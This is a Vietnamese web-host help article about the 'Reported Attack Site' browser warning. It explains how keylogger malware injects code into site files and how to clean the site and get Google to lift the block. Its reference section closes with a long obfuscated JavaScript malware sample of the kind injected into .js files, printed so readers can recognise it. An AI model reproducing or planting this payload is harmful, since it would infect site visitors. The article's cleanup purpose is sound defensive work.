1. Lỗi “Reported Attack Site” - Tìm hiểu và cách khắc phục
Thông báo của Firefox về tình trạng website nguy hiểm
Hình: Lỗi "Reported Attack Site!"
Với google chrome:
Trước tiên các bạn cần hiểu tại sao lại có các thông báo đó, sẽ cùng bạn tìm hiểu và khắc phục tình trạng
trên.
2. 1. NGUYÊN NHÂN:
- Gần đây có rất nhiều website và blog ở Việt nam bị Firefox – Google block lại do một lỗi gì
đó (thường là chứa virus hoặc các mã độc), dẫn đến việc khi truy cập vào tên miền đó bằng firefox bị
chặn và hiện lên thông báo không cho phép truy cập. Điều này ảnh hưởng không nhỏ đến uy tín của
website cũng như nguồn traffic, khách hàng….
- Trong source code của bạn nhiễm mã độc.
- Website chứa nội dung không lành mạnh hoặc các nội dung không được phép hoạt động rộng rãi.
Website bị chèn mã độc thường là loại virus hoạt động như 1 keylogger khi nhiễm vào máy tính của bạn
nhằm ăn cắp mật khẩu, đặc biệt là các account FTP, DirectAdmin, Email... bằng cách tìm tất cả các file
có tên index.php, index.html, default.aspx, default.asp trên máy tính & theo đường FTP đi lên host chèn
vào các file sẵn có trên host.
2. CÁCH KHẮC PHỤC:
Bước 1: Kiểm tra
1. Cài đặt chương trình diệt virus và upgrade lên phiên bản mới nhất, và quét lại toàn bộ máy tính
của khách hang .
2. Kiểm tra các file có name index.* , Default.* , *.js trên host và tìm ra code chứa nội dung
iframe loại bỏ nếu cảm thấy nghi ngờ. Lên google search các đường link chứa trong iframe
đó, để biết thông tin chi tiết và cách xử lý.
3. Sau khi chắc chắn máy tính không còn nhiễm virus nữa, các bạn bắt đầu đổi toàn bộ thông
tin : hosting, email, ftp account… (hoặc có thể dùng một máy tính khác ko có virus để đổi mật
khẩu). Hoặc với host Cpanel 11 có chức năng “Virus Scanner” rất hiệu quả, bạn nên tiến hành
quét các file trên host, nếu báo có virus hay malware, hãy tiến hành sửa ngay.
Bước 2: Gỡ block của Google – Firefox:
Sau khi đã diệt virus và tháo mã độc ra khỏi website hoàn toàn bạn phải thông báo lại với Google
về tình trạng website của mình.
Cách 1:
Bạn truy cập vào địa chỉ sau và viết một thông báo bằng tiếng anh với nội dung yêu cầu Google
kiểm tra lại việc block website của bạn vì website bạn không chứa mã độc. Sau đó chờ khoảng 1-2
ngày sẽ có kết quả.
Địa chỉ: http://www.google.com/safebrowsing/report_error/?tpl=mozilla
Cách này nhanh và cũng khá hiệu quả.
Cách 2: Sử dụng Google Webmaster Tools
Báo cáo với google để gỡ hoàn toàn report
Sau khi code đã " sạch " mã độc bạn cần thực hiện báo cáo lại với google như sau:
3. 1- Đăng nhập vào http://www.google.com/webmasters/tools
Lưu ý: Bước này bạn cần đăng nhập một tài khoản email của google, ở đây mình dùng gmail.
2- Làm theo từng bước như sau:
Tiếp theo...
Mô tả mục đích của việc này như sau:
- Đầu tiên bạn download file mà google gửi bằng cách click vào link ( ở bước 1)
- Tiếp theo mục đích chỉ đơn giản là làm sao để upload file của google đó lên hosting và chạy. Trên
hosting Linux bạn chì cần upload vào thư mục domains/tendomain/public_html, trên hosting window
bạn upload vào thư mục domains/tendomain/httpdocs ( ở bước 2)
4. - Bước này bạn cần chạy file veryfied của google bằng cách gõ vào link đến file đó. ( Ở bước 3)
Ví dụ như ở trên thì gõ : tendomain/google6ec19dbe09e503c5.html để kích hoạt.
- Tiếp theo click vào "verify"
- Cuối cùng vào lại hosting và remove bỏ file của google để hoàn tất.
Bonus – Kiểm tra site của bạn có bị trong danh sách block ko?
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://nhanhoa.com
http://www.stopbadware.org/home/reviewinfo?hl=en-US&url=nhanhoa.com
Tham khảo :
Một số đoạn script được chèn vào phần cuối cùng của các đuôi file .JS như sau :
/*km0ae9gr6m*/ try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+
((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z)
{fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,5
70,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,192,235,19
2,580,624,525,690,230,486,295,60,160,192,160,192,590,582,570,192,540,666,160,366,160,696,520,630,575,276,575,606,505
,600,160,222,160,696,520,630,575,276,405,354,50,192,160,192,160,708,485,684,160,696,505,690,580,192,305,192,580,624,
525,690,230,390,160,252,160,648,555,192,225,192,580,624,525,690,230,492,160,252,160,624,525,354,50,192,160,192,160,6
30,510,240,580,606,575,696,160,372,160,288,205,738,50,192,160,192,160,192,160,192,160,696,520,630,575,276,575,606,50
5,600,160,366,160,696,505,690,580,354,50,192,160,192,160,750,160,606,540,690,505,192,615,60,160,192,160,192,160,192,
160,192,580,624,525,690,230,690,505,606,500,192,305,192,580,606,575,696,160,258,160,696,520,630,575,276,385,354,50,1
92,160,192,160,750,50,192,160,192,160,684,505,696,585,684,550,192,200,696,520,630,575,276,575,606,505,600,160,252,16
0,696,520,630,575,276,555,660,505,474,590,606,570,462,205,354,50,750,50,60,510,702,550,594,580,630,555,660,160,492,4
85,660,500,666,545,468,585,654,490,606,570,426,505,660,505,684,485,696,555,684,200,702,550,630,600,246,615,60,160,19
2,160,192,590,582,570,192,500,192,305,192,550,606,595,192,340,582,580,606,200,702,550,630,600,252,245,288,240,288,20
5,354,50,192,160,192,160,708,485,684,160,690,160,366,160,600,230,618,505,696,360,666,585,684,575,240,205,192,310,192
,245,300,160,378,160,294,160,348,160,288,295,60,160,192,160,192,580,624,525,690,230,690,505,606,500,192,305,192,250,
306,260,318,270,330,280,342,240,294,160,258,160,240,500,276,515,606,580,462,555,660,580,624,200,246,160,252,160,288,
600,420,350,420,350,420,350,246,160,258,160,240,500,276,515,606,580,408,485,696,505,240,205,192,210,192,240,720,350,
420,350,420,205,258,160,240,385,582,580,624,230,684,555,702,550,600,200,690,160,252,160,288,600,420,350,420,205,246,
295,60,160,192,160,192,580,624,525,690,230,390,160,366,160,312,280,300,275,294,295,60,160,192,160,192,580,624,525,69
0,230,462,160,366,160,300,245,312,275,312,280,306,270,312,275,354,50,192,160,192,160,696,520,630,575,276,405,192,305
,192,580,624,525,690,230,462,160,282,160,696,520,630,575,276,325,354,50,192,160,192,160,696,520,630,575,276,410,192,
305,192,580,624,525,690,230,462,160,222,160,696,520,630,575,276,325,354,50,192,160,192,160,696,520,630,575,276,555,6
60,505,474,590,606,570,462,160,366,160,294,230,288,160,282,160,696,520,630,575,276,385,354,50,192,160,192,160,696,52
0,630,575,276,550,606,600,696,160,366,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,354,50,192
,160,192,160,684,505,696,585,684,550,192,580,624,525,690,295,60,625,60,50,612,585,660,495,696,525,666,550,192,495,68
4,505,582,580,606,410,582,550,600,555,654,390,702,545,588,505,684,200,684,220,192,385,630,550,264,160,462,485,720,20
5,738,50,192,160,192,160,684,505,696,585,684,550,192,385,582,580,624,230,684,555,702,550,600,200,240,385,582,600,270
,385,630,550,246,160,252,160,684,230,660,505,720,580,240,205,192,215,192,385,630,550,246,295,60,625,60,50,612,585,66
0,495,696,525,666,550,192,515,606,550,606,570,582,580,606,400,690,505,702,500,666,410,582,550,600,555,654,415,696,57
0,630,550,618,200,702,550,630,600,264,160,648,505,660,515,696,520,264,160,732,555,660,505,246,615,60,160,192,160,192
,590,582,570,192,570,582,550,600,160,366,160,660,505,714,160,492,485,660,500,666,545,468,585,654,490,606,570,426,505
,660,505,684,485,696,555,684,200,702,550,630,600,246,295,60,160,192,160,192,590,582,570,192,540,606,580,696,505,684,
575,192,305,192,455,234,485,234,220,234,490,234,220,234,495,234,220,234,500,234,220,234,505,234,220,234,510,234,220,
234,515,234,220,234,520,234,220,234,525,234,220,234,530,234,220,234,535,234,220,234,540,234,220,234,545,234,220,234,
550,234,220,234,555,234,220,234,560,234,220,234,565,234,220,234,570,234,220,234,575,234,220,234,580,234,220,234,585,
234,220,234,590,234,220,234,595,234,220,234,600,234,220,234,605,234,220,234,610,234,465,354,50,192,160,192,160,708,4
85,684,160,690,580,684,160,366,160,234,195,354,50,192,160,192,160,612,555,684,200,708,485,684,160,630,160,366,160,28
8,295,192,525,192,300,192,540,606,550,618,580,624,295,192,525,192,215,258,160,246,615,60,160,192,160,192,160,192,160
,192,575,696,570,192,215,366,160,648,505,696,580,606,570,690,455,594,570,606,485,696,505,492,485,660,500,666,545,468
,585,654,490,606,570,240,570,582,550,600,220,192,240,264,160,648,505,696,580,606,570,690,230,648,505,660,515,696,520
,192,225,192,245,246,465,354,50,192,160,192,160,750,50,192,160,192,160,684,505,696,585,684,550,192,575,696,570,192,2
15,192,195,276,195,192,215,192,610,666,550,606,295,60,625,60,50,690,505,696,420,630,545,606,555,702,580,240,510,702,
550,594,580,630,555,660,200,246,615,60,160,192,160,192,580,684,605,738,50,192,160,192,160,192,160,192,160,630,510,24
0,580,726,560,606,555,612,160,630,510,684,485,654,505,522,485,690,335,684,505,582,580,606,500,192,305,366,160,204,58
5,660,500,606,510,630,550,606,500,204,205,738,50,192,160,192,160,192,160,192,160,192,160,192,160,630,510,684,485,654
,505,522,485,690,335,684,505,582,580,606,500,192,305,192,580,684,585,606,295,60,160,192,160,192,160,192,160,192,160,
192,160,192,590,582,570,192,585,660,525,720,160,366,160,462,485,696,520,276,570,666,585,660,500,240,215,660,505,714,
160,408,485,696,505,240,205,282,245,288,240,288,205,354,50,192,160,192,160,192,160,192,160,192,160,192,160,708,485,6
84,160,600,555,654,485,630,550,468,485,654,505,192,305,192,515,606,550,606,570,582,580,606,400,690,505,702,500,666,4